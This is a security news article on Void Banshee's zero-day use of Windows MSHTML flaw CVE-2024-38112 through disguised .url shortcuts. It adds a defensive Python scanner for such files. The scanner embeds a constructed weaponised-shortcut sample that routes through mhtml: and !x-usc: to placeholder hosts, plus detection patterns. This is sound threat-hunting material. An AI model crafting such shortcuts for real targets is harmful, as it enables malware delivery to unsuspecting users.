July 16, 2024 By Zeljka Zorz
An exploit for CVE-2024-38112, a recently patched Windows MSHTML vulnerability, was used as a zero-day by an APT group dubbed Void Banshee to deliver malware to targets in North America, Europe, and Southeast Asia, threat hunters with Trend Micro’s Zero Day Initiative have shared.
How Void Banshee used CVE-2024-38112
As previously explained by Check Point researcher Haifei Li, the attackers used internet shortcut (.url) files that were specially crafted to exploit the vulnerability and disguised to look like PDFs.
“The threat actor leveraged CVE-2024-38112 to execute malicious code by abusing the MHTML protocol handler and x-usc directives through internet shortcut (URL) files. Using this technique, the threat actor was able to access and run files directly through the disabled Internet Explorer instance on Windows machines,” Trend Micro researchers noted.
“This MHTML code execution vulnerability was used to infect users and organizations with Atlantida malware.”
The attack chain (Source: Trend Micro)
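For defenders, the description above gives enough to hunt for: an internet shortcut whose URL= value starts with the mhtml: protocol handler and carries an !x-usc: directive, often with a document-like double extension so the shortcut passes for a PDF. The following scanner is an added example written for this article, not code from Trend Micro or Check Point; the two sample shortcuts embedded in it are constructed for illustration (the example.invalid hosts are placeholders, not real indicators), and the detection criteria are the three traits the article names, nothing more.

```python
"""Flag internet shortcut (.url) files that route through the MHTML
protocol handler with an x-usc directive, the technique described above.
Added example; the sample shortcuts are constructed, not real samples."""
import re
import sys
from dataclasses import dataclass, field
from pathlib import Path
from typing import Dict, Iterator, List

# Constructed sample: structurally what a weaponised shortcut looks like.
SUSPICIOUS_URL_FILE = """[InternetShortcut]
URL=mhtml:http://example.invalid/notice!x-usc:http://example.invalid/stage
ShowCommand=7
IconIndex=13
IconFile=C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe
"""

# Constructed sample: an ordinary shortcut that must not be flagged.
BENIGN_URL_FILE = """[InternetShortcut]
URL=https://example.invalid/docs/report
"""

MHTML_RE = re.compile(r"^mhtml:", re.IGNORECASE)
XUSC_RE = re.compile(r"!x-usc:", re.IGNORECASE)
DOUBLE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?)\.url$", re.IGNORECASE)


@dataclass
class Verdict:
    filename: str
    suspicious: bool
    reasons: List[str] = field(default_factory=list)
    targets: List[str] = field(default_factory=list)  # URLs embedded in the mhtml: value


def parse_internet_shortcut(text: str) -> Dict[str, str]:
    """Minimal parser for the INI-style .url format: key/value pairs under
    [InternetShortcut], keys lower-cased, section name matched case-insensitively."""
    values: Dict[str, str] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "internetshortcut"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip().lower()] = value.strip()
    return values


def split_mhtml_targets(url: str) -> List[str]:
    """mhtml:<base>!x-usc:<part> carries one or more embedded URLs; pull each
    one out (order kept, duplicates dropped) so it can be blocked or hunted for."""
    body = MHTML_RE.sub("", url, count=1)
    parts = [p for p in XUSC_RE.split(body) if p]
    return list(dict.fromkeys(parts))


def scan_url_file(filename: str, text: str) -> Verdict:
    """Apply the three traits from the write-up to one shortcut's contents."""
    fields = parse_internet_shortcut(text)
    url = fields.get("url", "")
    reasons: List[str] = []
    targets: List[str] = []
    uses_mhtml = bool(MHTML_RE.match(url))
    uses_xusc = bool(XUSC_RE.search(url))
    if uses_mhtml:
        reasons.append("URL uses the mhtml: protocol handler (forces MSHTML/IE rendering)")
        targets = split_mhtml_targets(url)
    if uses_xusc:
        reasons.append("URL contains an !x-usc: directive")
    if DOUBLE_EXT_RE.search(filename):
        reasons.append("double extension masquerades as a document")
    # Only the protocol-handler traits decide the verdict; the double
    # extension is recorded as supporting context.
    return Verdict(filename, uses_mhtml or uses_xusc, reasons, targets)


def scan_directory(root: str) -> Iterator[Verdict]:
    """Walk a tree (e.g. a Downloads folder) and yield a verdict per .url file."""
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() == ".url":
            yield scan_url_file(path.name, path.read_text(errors="ignore"))


if __name__ == "__main__":
    verdicts = (list(scan_directory(sys.argv[1])) if len(sys.argv) > 1 else
                [scan_url_file("Invoice.pdf.url", SUSPICIOUS_URL_FILE),
                 scan_url_file("report.url", BENIGN_URL_FILE)])
    for v in verdicts:
        print(f"{v.filename}: {'SUSPICIOUS' if v.suspicious else 'ok'} {v.reasons} {v.targets}")
```

The scanner is a hunting aid, not the fix: the vulnerability is closed by the July 2024 patch, and a shortcut that passes these checks can still be malicious in other ways, so treat a clean verdict as absence of this particular pattern only.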
